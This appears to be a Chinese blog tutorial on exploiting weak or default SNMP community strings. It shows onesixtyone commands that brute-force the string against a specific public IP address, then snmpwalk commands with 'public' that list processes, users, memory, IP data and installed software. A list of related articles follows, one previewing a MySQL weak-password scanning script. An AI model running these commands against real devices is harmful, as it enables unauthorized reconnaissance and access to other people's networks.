科普Snmap:

  简单网络管理协议(SNMP) 是专门设计用于在 IP 网络管理网络节点(服务器、工作站、路由器、交换机及HUBS等)的一种标准协议,它是一种应用层协议。具体废话就不多说了,自己百度去。默认端口号是:161

如果能获取只读(RO)或读/写(RW)权限的团体字符串,将对你从设备中提取信息发挥重要作用,

snmp v1 v2天生存在安全缺陷,snmp v3中添加了加密功能提供了更好的检查机制,增强了安全性为了获取管理一台交换机的权限,首先你需要找到它的SNMP团体字符串。

团体字符串默认为:public

如果你不知道目标团体字符串

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 58.215.76.23 -o my.log -w 100

显示对方团体字符串为 public

查看onesixtyone 目录

dpkg -L onesixtyone

查看自带密码目录,你也可以使用自己的字典

cat /usr/share/doc/onesixtyone/dict.txt





snmpwalk -c public -v 1  ip .1.3.6.1.2.1.25.1 得到取得windows端的系统进程用户数等


snmpwalk -c public -v 1 ip .1.3.6.1.2.1.25.2.2 取得系统总内存


snmpwalk -c public -v 1  ip hrSystemNumUsers 取得系统用户数


snmpwalk -c public -v 1  ip .1.3.6.1.2.1.4.20 取得IP信息


snmpwalk -v 2c -c public ip .1.3.6.1.2.1.1 查看系统信息


其中-v是指版本,-c 是指密钥。


snmpwalk功能很多,可以获取系统各种信息,只要更改后面的信息类型即可。如果不知道什么类型,也可以不指定,这样所有系统信息都获取到:


常用:snmpwalk -v 2c -c public 10.0.1.52


另外常用的


.1.3.6.1.4.1.77.1.4.1.0  列出域名
.1.3.6.1.2.1.25.6.3.1.2  列出安装的软件


.1.3.6.1.2.1.25.4.2.1.2  列出系统进程


展示一波成功的案例:






 
												


											
snmap弱口令攻击利用的更多相关文章
	

    
								
  1. oracle弱口令攻击
		
    oracle弱口令攻击   0x00 oracle数据库简介 oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点: 一.支持大数据 ...
    
		
    2. 
						
  2. 全国职业技能大赛信息安全管理与评估-MySQL弱口令利用
		
    MySQL读文件 #coding=utf-8 import MySQLdb host = '172.16.1.' for i in range(129,131): tag = host+str(i)  ...
    
		
    3. 
						
  3. 攻防世界-Web-lottery(.git泄露、php源码审计、弱类型利用)
		
    扫描目录,发现.git泄露: 提取.git泄露的源码,得到许多文件: 网站这里: 这就要审计一下代码,找找漏洞了. 经过一番审计,猜数字对应的函数在api.php中: 我们要绕过这个$win_numb ...
    
		
    4. 
						
  4. IoT设备上的恶意软件——通过漏洞、弱密码渗透
		
    2018年,是 IoT 高速发展的一年,从空调到电灯,从打印机到智能电视,从路由器到监控摄像头统统都开始上网.随着5G网络的发展,我们身边的 IoT 设备会越来越多.与此同时,IoT 的安全问题也慢慢 ...
    
		
    5. 
						
  5. 简单说说.Net中的弱引用
		
    弱引用是什么? 要搞清楚什么是弱引用,我们需要先知道强引用是什么.强引用并不是什么深奥的概念,其实我们平时所使用的.Net引用就是强引用.例如: Cat kitty = new Cat(); 变量ki ...
    
		
    6. 
						
  6. .NET中的弱引用
		
    弱引用是什么? 要搞清楚什么是弱引用,我们需要先知道强引用是什么.强引用并不是什么深奥的概念,其实我们平时所使用的.Net引用就是强引用.例如: Cat cat = new Cat(); 变量cat就 ...
    
		
    7. 
						
  7. snmp默认团体名/弱口令漏洞及安全加固
		
    0x00基础知识 简单网络管理协议(SNMP)被广泛用于计算机操作系统设备.网络设备等领域监测连接到网络上的设备是否有任何引起管理上关注的情况.在运行SNMP服务的设备上,若管理员配置不当运行默认团体 ...
    
		
    8. 
						
  8. Linux安全事件应急响应排查方法总结
		
    Linux安全事件应急响应排查方法总结 Linux是服务器操作系统中最常用的操作系统,因为其拥有高性能.高扩展性.高安全性,受到了越来越多的运维人员追捧.但是针对Linux服务器操作系统的安全事件也非 ...
    
		
    9. 
						
  9. Window应急响应(四):挖矿病毒
		
    0x00 前言 ​ 随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一.病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. IDEA如何添加库lib(java)
			
    1.点击file 2.点击 3.点击 4.点击右面+号 5.找到你的类库添加即可
    
			
    2. 
						
  2. mac电脑终端使用scp上传/下载文件/文件夹
			
    1.从服务器下载文件到本地电脑 1 scp -r remote_username@remote_ip:remote_folder local_folder 例如: 1 scp -r root@106. ...
    
			
    3. 
						
  3. Welcome to Erhan Blog
			
    "Yeah It's on. " 前言 Erhan 的 Blog 就这么开通了. 跳过废话,直接看技术实现 2018 年,Hux 总算有个地方可以好好写点东西了. 作为一个程序员, ...
    
			
    4. 
						
  4. 使用Handler的步骤
			
    使用Handler的大致流程: 1.首先创建一个Handler对象,可以直接使用Handler无参构造函数创建Handler对象,也可以继承Hander类,重写HandleMessage方法来创建Ha ...
    
			
    5. 
						
  5. Shell之Here Document
			
    EOF本意是 End Of File,表明到了文件末尾. 使用格式基本是这样的: 命令 << EOF 内容段EOF将“内容段”整个作为命令的输入.你的代码里就是用cat命令读入整段字符串并 ...
    
			
    6. 
						
  6. install jekyll
			
    最直接的方法就是运行快速指南中的命令: gem install jekyll 这个时候会提示: Command 'gem' not found, but can be installed with:  ...
    
			
    7. 
						
  7. C++扬帆远航——1
			
    问题及代码: /* * Copyright (c) 2016,烟台大学计算机与控制工程学院 * All rights reserved. * 文件名:test.cpp * 作者:常轩 * 完成日期:2 ...
    
			
    8. 
						
  8. flask 中文乱码
			
    返回的json数据中包含中文,但前端显示乱码,添加了 app.config['JSON_AS_ASCII'] = False仍然没有解决, app.config['JSONIFY_MIMETYPE'] ...
    
			
    9. 
						
  9. 利用 Rize 来进行 UI 测试或 E2E 测试
			
    之前我曾经在<Rize - 一个可以让你简单.优雅地使用 puppeteer 的 Node.js 库>一文简单介绍过 Rize 这个库.当时仅仅是介绍这个库本身,关于如何使用,我没有给太多 ...
    
			
    10. 
						
  10. Python基础-生物信息:找出基因,生物学家使用字母A、C、T和G构成的字符串建模一个基因组。
			
    生物信息:找出基因,生物学家使用字母A.C.T和G构成的字符串建模一个基因组.一个基因是基因组的子串,它从三元组ATG后开始在三元组TAG.TAA或TGA之前结束.此外,基因字符串的长度是3的倍数,而 ...
    
			
    11.